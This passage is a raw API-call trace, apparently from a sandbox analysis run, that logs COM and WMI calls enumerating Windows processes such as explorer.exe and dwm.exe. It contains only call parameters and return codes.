[7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e890c0) returned 0x0 [0223.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e890c0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.728] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e890c0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x768ba8) returned 0x0 [0223.728] WbemDefPath:IUnknown:Release (This=0x5e890c0) returned 0x0 [0223.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x768ba8) returned 0x0 [0223.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.728] WbemDefPath:IUnknown:AddRef (This=0x768ba8) returned 0x3 [0223.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.728] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e890d0) returned 0x0 [0223.729] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e890d0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.729] WbemDefPath:IUnknown:Release (This=0x5e890d0) returned 0x3 [0223.729] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.729] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.729] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x2 [0223.729] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x1 [0223.729] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.729] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x768ba8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x768ba8) returned 0x0 [0223.729] WbemDefPath:IUnknown:AddRef (This=0x768ba8) returned 0x3 [0223.729] WbemDefPath:IUnknown:Release (This=0x768ba8) returned 0x2 [0223.729] WbemDefPath:IWbemPath:SetText (This=0x768ba8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"912\"") returned 0x0 [0223.729] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.729] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.729] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.730] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.730] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.730] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.730] IWbemClassObject:Get (in: This=0x6d7a30, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26df7f4*=0, plFlavor=0x26df7f8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x26df7f4*=8, plFlavor=0x26df7f8*=0) returned 0x0 [0223.730] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0223.730] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0223.730] IWbemClassObject:Get (in: This=0x6d7a30, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26df7f4*=8, plFlavor=0x26df7f8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer.exe", varVal2=0x0), pType=0x26df7f4*=8, plFlavor=0x26df7f8*=0) returned 0x0 [0223.730] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0223.730] SysStringByteLen (bstr="explorer.exe") returned 0x18 [0223.730] CoTaskMemAlloc (cb=0x4) returned 0x5e89110 [0223.730] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89110, puReturned=0x26dde18 | out: apObjects=0x5e89110*=0x796e90, puReturned=0x26dde18*=0x1) returned 0x0 [0223.731] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x796e90) returned 0x0 [0223.732] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.732] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.732] IUnknown:AddRef (This=0x796e90) returned 0x3 [0223.732] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.732] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.732] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x796e94) returned 0x0 [0223.732] IMarshal:GetUnmarshalClass (in: This=0x796e94, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.732] IUnknown:Release (This=0x796e94) returned 0x3 [0223.732] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.733] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.733] IUnknown:QueryInterface (in: This=0x796e90, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.733] IUnknown:Release (This=0x796e90) returned 0x2 [0223.733] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.733] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.733] IUnknown:QueryInterface (in: This=0x796e90, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x796e90) returned 0x0 [0223.733] IUnknown:AddRef (This=0x796e90) returned 0x4 [0223.733] IUnknown:Release (This=0x796e90) returned 0x3 [0223.733] IUnknown:Release (This=0x796e90) returned 0x2 [0223.733] CoTaskMemFree (pv=0x5e89110) [0223.733] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.733] IUnknown:AddRef (This=0x796e90) returned 0x3 [0223.733] IWbemClassObject:Get (in: This=0x796e90, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.734] IWbemClassObject:Get (in: This=0x796e90, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.734] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x66 [0223.734] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x66 [0223.734] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0223.734] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0223.734] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0223.734] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0223.735] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89110) returned 0x0 [0223.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89110, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0223.736] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89110, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x769078) returned 0x0 [0223.736] WbemDefPath:IUnknown:Release (This=0x5e89110) returned 0x0 [0223.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x769078) returned 0x0 [0223.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0223.736] WbemDefPath:IUnknown:AddRef (This=0x769078) returned 0x3 [0223.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0223.736] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0223.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89120) returned 0x0 [0223.737] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89120, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0223.737] WbemDefPath:IUnknown:Release (This=0x5e89120) returned 0x3 [0223.737] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0223.737] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0223.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0223.737] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x2 [0223.737] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x1 [0223.737] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0223.737] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0223.737] WbemDefPath:IUnknown:QueryInterface (in: This=0x769078, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x769078) returned 0x0 [0223.737] WbemDefPath:IUnknown:AddRef (This=0x769078) returned 0x3 [0223.737] WbemDefPath:IUnknown:Release (This=0x769078) returned 0x2 [0223.737] WbemDefPath:IWbemPath:SetText (This=0x769078, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1052\"") returned 0x0 [0223.737] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0223.737] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0223.737] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.738] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0223.738] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0223.738] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0223.738] IWbemClassObject:Get (in: This=0x796e90, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e0068*=0, plFlavor=0x26e006c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x26e0068*=8, plFlavor=0x26e006c*=0) returned 0x0 [0223.738] SysStringByteLen (bstr="dwm.exe") returned 0xe [0223.738] SysStringByteLen (bstr="dwm.exe") returned 0xe [0223.738] IWbemClassObject:Get (in: This=0x796e90, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e0068*=8, plFlavor=0x26e006c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="dwm.exe", varVal2=0x0), pType=0x26e0068*=8, plFlavor=0x26e006c*=0) returned 0x0 [0223.738] SysStringByteLen (bstr="dwm.exe") returned 0xe [0223.738] SysStringByteLen (bstr="dwm.exe") returned 0xe [0223.738] CoTaskMemAlloc (cb=0x4) returned 0x5e89150 [0223.738] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89150, puReturned=0x26dde18 | out: apObjects=0x5e89150*=0x5e86310, puReturned=0x26dde18*=0x1) returned 0x0 [0223.739] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e86310) returned 0x0 [0223.740] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0223.740] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0223.740] IUnknown:AddRef (This=0x5e86310) returned 0x3 [0223.740] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0223.740] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0223.740] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e86314) returned 0x0 [0223.740] IMarshal:GetUnmarshalClass (in: This=0x5e86314, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0223.740] IUnknown:Release (This=0x5e86314) returned 0x3 [0223.740] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0223.741] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0223.741] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0223.741] IUnknown:Release (This=0x5e86310) returned 0x2 [0223.741] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0223.741] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0223.741] IUnknown:QueryInterface (in: This=0x5e86310, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e86310) returned 0x0 [0223.741] IUnknown:AddRef (This=0x5e86310) returned 0x4 [0223.741] IUnknown:Release (This=0x5e86310) returned 0x3 [0223.741] IUnknown:Release (This=0x5e86310) returned 0x2 [0223.741] CoTaskMemFree (pv=0x5e89150) [0223.741] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0223.741] IUnknown:AddRef (This=0x5e86310) returned 0x3 [0223.742] IWbemClassObject:Get (in: This=0x5e86310, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0223.742] IWbemClassObject:Get (in: This=0x5e86310, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0223.742] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x66 [0223.742] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"1288\"") returned 0x66 [0223.742] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, 